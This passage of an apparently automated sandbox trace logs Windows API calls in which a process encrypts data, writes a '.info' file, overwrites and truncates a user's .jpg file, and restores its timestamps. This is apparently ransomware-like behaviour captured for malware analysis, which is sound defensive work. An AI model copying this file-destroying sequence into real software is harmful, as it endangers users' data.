pbData=0x2175f90*, pdwDataLen=0x1c0ee4f0*=0x10) returned 1 [0070.694] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2175fe0*, pdwDataLen=0x1c0ee4f0*=0x0, dwBufLen=0x10 | out: pbData=0x2175fe0*, pdwDataLen=0x1c0ee4f0*=0x10) returned 1 [0070.694] WriteFile (in: hFile=0x384, lpBuffer=0x2174f78*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x1c0ee478, lpOverlapped=0x0 | out: lpBuffer=0x2174f78*, lpNumberOfBytesWritten=0x1c0ee478*=0x980, lpOverlapped=0x0) returned 1 [0070.694] CloseHandle (hObject=0x384) returned 1 [0070.695] CloseHandle (hObject=0x398) returned 1 [0070.695] CryptDestroyKey (hKey=0x1a626bb0) returned 1 [0070.695] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0070.695] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0070.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", nBufferLength=0x105, lpBuffer=0x1c0edfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068", lpFilePart=0x0) returned 0x4b [0070.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee490) returned 1 [0070.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\f5f89e0f78370ba0ff833857812ea068"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.696] GetFileType (hFile=0x398) returned 0x1 [0070.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee400) returned 1 [0070.696] GetFileType (hFile=0x398) returned 0x1 [0070.696] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.697] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.698] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.699] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.700] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.701] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.701] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.701] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.701] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.701] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.701] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.701] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.701] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.701] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.702] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.702] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.702] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.702] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.702] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.702] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.702] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x980, lpOverlapped=0x0) returned 1 [0070.702] ReadFile (in: hFile=0x398, lpBuffer=0x2176710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x2176710*, lpNumberOfBytesRead=0x1c0ee578*=0x0, lpOverlapped=0x0) returned 1 [0070.702] CloseHandle (hObject=0x398) returned 1 [0070.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068.info", nBufferLength=0x105, lpBuffer=0x1c0edd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068.info", lpFilePart=0x0) returned 0x50 [0070.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee210) returned 1 [0070.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\F5F89E0F78370BA0FF833857812EA068.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\f5f89e0f78370ba0ff833857812ea068.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.705] GetFileType (hFile=0x398) returned 0x1 [0070.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee180) returned 1 [0070.705] GetFileType (hFile=0x398) returned 0x1 [0070.706] WriteFile (in: hFile=0x398, lpBuffer=0x2182df0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1c0ee2e8, lpOverlapped=0x0 | out: lpBuffer=0x2182df0*, lpNumberOfBytesWritten=0x1c0ee2e8*=0x77d, lpOverlapped=0x0) returned 1 [0070.706] CloseHandle (hObject=0x398) returned 1 [0070.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee5a0) returned 1 [0070.707] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\cics85oqp.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1c0ee680 | out: lpFileInformation=0x1c0ee680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x222e8320, ftCreationTime.dwHighDateTime=0x1d4d3b2, ftLastAccessTime.dwLowDateTime=0xfc3a1d20, ftLastAccessTime.dwHighDateTime=0x1d4ca6d, ftLastWriteTime.dwLowDateTime=0xfc3a1d20, ftLastWriteTime.dwHighDateTime=0x1d4ca6d, nFileSizeHigh=0x0, nFileSizeLow=0x1497c)) returned 1 [0070.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee560) returned 1 [0070.708] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.708] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", dwFileAttributes=0x80) returned 1 [0070.708] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee5e0) returned 1 [0070.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\cics85oqp.jpg"), fInfoLevelId=0x0, lpFileInformation=0x218a9e8 | out: lpFileInformation=0x218a9e8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x222e8320, ftCreationTime.dwHighDateTime=0x1d4d3b2, ftLastAccessTime.dwLowDateTime=0xfc3a1d20, ftLastAccessTime.dwHighDateTime=0x1d4ca6d, ftLastWriteTime.dwLowDateTime=0xfc3a1d20, ftLastWriteTime.dwHighDateTime=0x1d4ca6d, nFileSizeHigh=0x0, nFileSizeLow=0x1497c)) returned 1 [0070.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5a0) returned 1 [0070.708] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0edff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4d0) returned 1 [0070.708] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\cics85oqp.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.708] GetFileType (hFile=0x398) returned 0x1 [0070.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee440) returned 1 [0070.708] GetFileType (hFile=0x398) returned 0x1 [0070.708] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0070.709] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.710] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.711] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.711] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.712] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.713] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.714] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.754] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.754] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.755] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.756] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.757] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.757] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.758] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.759] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.760] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.760] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.771] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.772] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.773] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.773] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1c0ee5d8, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee5d8*=0xa00, lpOverlapped=0x0) returned 1 [0070.774] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0070.774] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.775] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.776] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.778] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.779] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.779] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.780] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.781] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.782] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.783] WriteFile (in: hFile=0x398, lpBuffer=0x218ae80*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x218ae80*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.784] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0070.787] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0070.787] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee648*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee648*=0) returned 0x0 [0070.788] SetEndOfFile (hFile=0x398) returned 1 [0070.789] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee648*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1c0ee648*=0) returned 0x0 [0070.789] CloseHandle (hObject=0x398) returned 1 [0070.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0070.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\cics85oqp.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.789] GetFileType (hFile=0x398) returned 0x1 [0070.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0070.789] GetFileType (hFile=0x398) returned 0x1 [0070.789] SetFileTime (hFile=0x398, lpCreationTime=0x1c0ee6a8, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.790] CloseHandle (hObject=0x398) returned 1 [0070.790] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0070.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\cics85oqp.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.790] GetFileType (hFile=0x398) returned 0x1 [0070.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0070.790] GetFileType (hFile=0x398) returned 0x1 [0070.790] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1c0ee6a8, lpLastWriteTime=0x0) returned 1 [0070.790] CloseHandle (hObject=0x398) returned 1 [0070.790] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg", lpFilePart=0x0) returned 0x38 [0070.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0070.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\cicS85OQp.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\cics85oqp.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.790] GetFileType (hFile=0x398) returned 0x1 [0070.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0070.791] GetFileType (hFile=0x398) returned 0x1 [0070.791] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1c0ee6a8) returned 1 [0070.791] CloseHandle (hObject=0x398) returned 1 [0070.791] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 